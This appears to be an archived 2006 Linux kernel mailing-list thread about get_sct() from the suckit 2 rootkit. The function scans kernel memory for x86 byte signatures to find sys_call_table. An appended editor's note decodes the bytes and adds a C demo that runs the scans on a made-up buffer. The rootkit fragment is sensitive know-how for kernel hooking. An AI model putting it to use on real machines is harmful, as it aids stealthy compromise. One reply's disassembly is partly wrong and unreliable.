linux-kernel.vger.kernel.org archive mirror
* What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
@ 2006-04-06  1:38 openbsd shen
  2006-04-06 12:15 ` linux-os (Dick Johnson)
                   ` (2 more replies)
  0 siblings, 3 replies; 5+ messages in thread
From: openbsd shen @ 2006-04-06  1:38 UTC (permalink / raw)
  To: kernel

This code is from get_sct() of suckit 2. Why does memmem() use
"\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", and what does it want to find?
The get_sct() function:

ulong   get_sct()
{
        uchar   code[SCLEN+256];
        uchar   *p, *pt;
        ulong   r;
        uchar   pt_off, pt_bit;
        int     i;

        kernel_old80 = get_ep();        /* entry point address; kernel_old80 is a global set here */

        if (!kernel_old80)
                return 0;
        /* read kernel memory starting 4 bytes before the entry point */
        if (rkm(code, sizeof(code), kernel_old80-4) <= 0)
                return 0;

        if (!memcmp(code, "PUNK", 4))
                return 0;

        /* ff 14 85 disp32 = call *disp32(,%eax,4) */
        p = (uchar *) memmem(code, SCLEN, "\xff\x14\x85", 3);
        if (!p) return 0;

        /* c7 44 24 18 da ff ff ff = movl $0xffffffda,0x18(%esp); e8 = call rel32 */
        pt = (uchar *) memmem(p+7, SCLEN-(p-code)-7,
                "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);
        /* when it runs to here, it always returns 0 */
        if (!pt) {
                eprintf("pt = %p\n", (void *) pt);
                return 0;
        }

        /* rel32 after the e8, made absolute against the address of the next instruction */
        sc.trace = *((ulong *) (pt + 9));
        sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4;

        pt = (uchar *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3);
        if (!pt) return 0;

        /* f6 43 off bit 75 = testb $bit,off(%ebx); jne */
        for (i = 0; i < (p-code); i++) {
                if ((code[i] == 0xf6) && (code[i+1] == 0x43) &&
                    (code[i+4] == 0x75) && (code[i+2] < 127)) {
                        pt_off = code[i+2];
                        pt_bit = code[i+3];
                        goto cc;        /* label cc: is not part of the quoted fragment */
                }
        }

        return 0;
}


* Re: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
  2006-04-06  1:38 What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" openbsd shen
@ 2006-04-06 12:15 ` linux-os (Dick Johnson)
  2006-04-06 13:32   ` David Schwartz
  2006-04-08  9:06 ` Jan Engelhardt
  2006-04-10 20:17 ` Dan Sheppard
  2 siblings, 1 reply; 5+ messages in thread
From: linux-os (Dick Johnson) @ 2006-04-06 12:15 UTC (permalink / raw)
  To: openbsd shen; +Cc: kernel



In what file did you find this? This is how back-doors are written!

On Wed, 5 Apr 2006, openbsd shen wrote:

> this code from get_sct() of suckit 2, why memmem()
> "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find?
> The get_sct() founction:
>
> ulong   get_sct()
> {
>        uchar   code[SCLEN+256];
>        uchar   *p, *pt;
>        ulong   r;
>        uchar   pt_off, pt_bit;
>        int     i;
>
>        kernel_old80 = get_ep();
>
>        if (!kernel_old80)
>                return 0;
>        if (rkm(code, sizeof(code), kernel_old80-4) <= 0)
>                return 0;
>
>        if (!memcmp(code, "PUNK", 4))
>                return 0;
>
>        p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);
>        if (!p) return 0;
>
>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
>                "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);
>        /* when run at here , it always return 0 */
>        if (!pt) {
>                eprintf("pt = %s\n", pt);
>                return 0;
>        }
>
>        sc.trace = *((ulong *) (pt + 9));
>        sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4;
>
>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7, "\xff\x14\x85", 3);
>        if (!pt) return 0;
>
>        for (i = 0; i < (p-code); i++) {
>                if ((code[i] == 0xf6) && (code[i+1] == 0x43) &&
>                    (code[i+4] == 0x75) && (code[i+2] < 127)) {
>                        pt_off = code[i+2];
>                        pt_bit = code[i+3];
>                        goto cc;
>                }
>        }
>
>        return 0;
> }
> -

Cheers,
Dick Johnson
Penguin : Linux version 2.6.15.4 on an i686 machine (5589.42 BogoMips).
Warning : 98.36% of all statistics are fiction, book release in April.


* RE: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
  2006-04-06 12:15 ` linux-os (Dick Johnson)
@ 2006-04-06 13:32   ` David Schwartz
  0 siblings, 0 replies; 5+ messages in thread
From: David Schwartz @ 2006-04-06 13:32 UTC (permalink / raw)
  To: linux-os (Dick Johnson), openbsd shen; +Cc: kernel


> In what file did you find this? This is how back-doors are written!
> 
> On Wed, 5 Apr 2006, openbsd shen wrote:
> 
> > this code from get_sct() of suckit 2, why memmem()
> > "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"use, what it want to find?
> > The get_sct() founction:

	As he said, it's from "suckit 2", a root kit.

	Back-doors in a root kit? Whodathunkit. ;)

	DS




* Re: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
  2006-04-06  1:38 What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" openbsd shen
  2006-04-06 12:15 ` linux-os (Dick Johnson)
@ 2006-04-08  9:06 ` Jan Engelhardt
  2006-04-10 20:17 ` Dan Sheppard
  2 siblings, 0 replies; 5+ messages in thread
From: Jan Engelhardt @ 2006-04-08  9:06 UTC (permalink / raw)
  To: openbsd shen; +Cc: kernel

>Subject: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"

Does not look like x86 asm code:

>        p = (char *) memmem(code, SCLEN, "\xff\x14\x85", 3);

call dword ptr [edx-...]

>        pt = (char *) memmem(p+7, SCLEN-(p-code)-7,
>                "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8", 9);

mov dword ptr [esp+0x18], 0xffffffda


Nope, does not look meaningful if taken as x86 asm.


Jan Engelhardt
-- 

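Editor's note, added to this archive page and not part of any message in the thread: the two signatures in the get_sct() fragment posted above, and the two that Jan decodes, are byte patterns from the i386 entry.S syscall path. "\xff\x14\x85" is opcode FF /2 with ModRM 0x14 and SIB 0x85, i.e. call *disp32(,%eax,4): scale 4, index eax, no base, so the disp32 that follows is the address of sys_call_table. "\xc7\x44\x24\x18\xda\xff\xff\xff" is movl $0xffffffda,0x18(%esp), and 0xffffffda is -38, which is -ENOSYS on Linux; the trailing "\xe8" is the opcode of a rel32 call, so the four bytes after it are a displacement from the end of that 5-byte call, which is what the "- 4 + 9 + 4" arithmetic in sc.trace undoes. The loop at the end looks for testb $imm8,disp8(%ebx) followed by jne (F6 /0, ModRM 0x43, 0x75). Because every one of these is an exact encoding, a kernel whose entry path was compiled even slightly differently yields no match, which is the behaviour the "always return 0" comment reports. The program below is an added example written for this page, not code from suckit or from the kernel: it runs the same three scans over a constructed byte image laid out like that entry path and turns the matches into absolute addresses. FAKE_ENTRY, the fake_kernel bytes, and the addresses inside them are all made up for the demonstration.

```c
/* Decoding the byte signatures that get_sct() scans for.
 * Added example for this page; the buffer is constructed, not kernel memory. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed entry point address (assumption, not a real kernel value). */
#define FAKE_ENTRY 0xc0106f00U

/* Constructed image of the bytes at FAKE_ENTRY - 4, laid out like the i386
 * entry.S syscall path the signatures were written for. Not real kernel memory. */
static const uint8_t fake_kernel[] = {
    0x90, 0x90, 0x90, 0x90,                         /* the 4 bytes before the entry point */
    0x50, 0x53,                                     /* pushl %eax; pushl %ebx (filler) */
    0xf6, 0x43, 0x14, 0x02, 0x75, 0x20,             /* testb $0x02,0x14(%ebx); jne tracesys */
    0xff, 0x14, 0x85, 0x00, 0x50, 0x2b, 0xc0,       /* call *0xc02b5000(,%eax,4): sys_call_table */
    0x89, 0x44, 0x24, 0x18,                         /* movl %eax,0x18(%esp) */
    0xc3,                                           /* ret (filler) */
    0xc7, 0x44, 0x24, 0x18, 0xda, 0xff, 0xff, 0xff, /* movl $-ENOSYS,0x18(%esp) */
    0xe8, 0x10, 0x00, 0x00, 0x00,                   /* call +0x10 -> syscall_trace */
    0x8b, 0x44, 0x24, 0x2c,                         /* movl 0x2c(%esp),%eax */
    0xff, 0x14, 0x85, 0x00, 0x50, 0x2b, 0xc0,       /* second call *sys_call_table(,%eax,4) */
};

struct sct_info {
    uint32_t sys_call_table;  /* disp32 of call *table(,%eax,4) */
    uint32_t syscall_trace;   /* absolute target of the e8 after movl $-ENOSYS */
    uint8_t  trace_off;       /* displacement tested by testb off(%ebx) */
    uint8_t  trace_bit;       /* immediate of that testb */
};

/* Portable replacement for GNU memmem(). */
static const uint8_t *find_bytes(const uint8_t *hay, size_t hlen,
                                 const uint8_t *needle, size_t nlen)
{
    if (nlen == 0 || hlen < nlen) return NULL;
    for (size_t i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0)
            return hay + i;
    return NULL;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 1 and fills *out when all signatures match, 0 otherwise.
 * base is the address of code[0] (kernel_old80 - 4 in get_sct()). */
int decode_entry(const uint8_t *code, size_t len, uint32_t base, struct sct_info *out)
{
    static const uint8_t call_tbl[]  = { 0xff, 0x14, 0x85 };
    static const uint8_t trace_sig[] = { 0xc7, 0x44, 0x24, 0x18, 0xda, 0xff, 0xff, 0xff, 0xe8 };
    const uint8_t *p, *pt, *p2;
    size_t i;

    /* FF /2, ModRM 0x14 (SIB follows), SIB 0x85 (eax*4 + disp32, no base) */
    p = find_bytes(code, len, call_tbl, sizeof call_tbl);
    if (!p || (size_t)(p - code) + 7 > len) return 0;
    out->sys_call_table = le32(p + 3);

    /* movl $0xffffffda,0x18(%esp) immediately followed by call rel32 */
    pt = find_bytes(p + 7, len - (p - code) - 7, trace_sig, sizeof trace_sig);
    if (!pt || (size_t)(pt - code) + 13 > len) return 0;
    /* rel32 is relative to the end of the 5-byte call, i.e. pt + 9 + 4 */
    out->syscall_trace = base + (uint32_t)(pt - code) + 9 + 4 + le32(pt + 9);

    /* the trace path calls through the table again; require it, as get_sct() does */
    p2 = find_bytes(p + 7, len - (p - code) - 7, call_tbl, sizeof call_tbl);
    if (!p2) return 0;

    /* testb $imm8,disp8(%ebx); jne, somewhere before the first table call */
    for (i = 0; i + 4 < (size_t)(p - code); i++) {
        if (code[i] == 0xf6 && code[i + 1] == 0x43 &&
            code[i + 4] == 0x75 && code[i + 2] < 127) {
            out->trace_off = code[i + 2];
            out->trace_bit = code[i + 3];
            return 1;
        }
    }
    return 0;
}

/* Runs the decoder over the constructed image; NULL if a signature is missing. */
const struct sct_info *decode_fake(void)
{
    static struct sct_info info;
    if (!decode_entry(fake_kernel, sizeof fake_kernel, FAKE_ENTRY - 4, &info))
        return NULL;
    return &info;
}

int main(void)
{
    const struct sct_info *r = decode_fake();
    if (!r) { puts("no match"); return 1; }
    printf("sys_call_table = 0x%08x\n", r->sys_call_table);
    printf("syscall_trace  = 0x%08x\n", r->syscall_trace);
    printf("trace flag: testb $0x%02x,0x%02x(%%ebx)\n", r->trace_bit, r->trace_off);
    return 0;
}
```

The same arithmetic as the fragment's "sc.trace += kernel_old80 + (pt - code) - 4 + 9 + 4" appears here as base + (pt - code) + 13 with base = FAKE_ENTRY - 4; on the constructed image that resolves the rel32 of 0x10 to 0xc0106f31. Removing or re-encoding any one instruction in fake_kernel (for example replacing the testb with a testw) makes decode_fake() return NULL, which is the failure mode a signature-based scanner of this kind has on a kernel it was not written against.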

* Re: What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8"
  2006-04-06  1:38 What means "\xc7\x44\x24\x18\xda\xff\xff\xff\xe8" openbsd shen
  2006-04-06 12:15 ` linux-os (Dick Johnson)
  2006-04-08  9:06 ` Jan Engelhardt
@ 2006-04-10 20:17 ` Dan Sheppard
  2 siblings, 0 replies; 5+ messages in thread
From: Dan Sheppard @ 2006-04-10 20:17 UTC (permalink / raw)
  To: openbsd shen; +Cc: kernel

I can explain this, but I'll need a bit more convincing about your whitehated-ness.

I've been dabbling for a while with custom-kitting a honeypot machine with a kit 
which sits under suckit2 and event-logs it, to see what da kidz get up to on 
suckit'ed machines. Just curiosity, really, having come up against suckit a fair 
few times.

Dan.

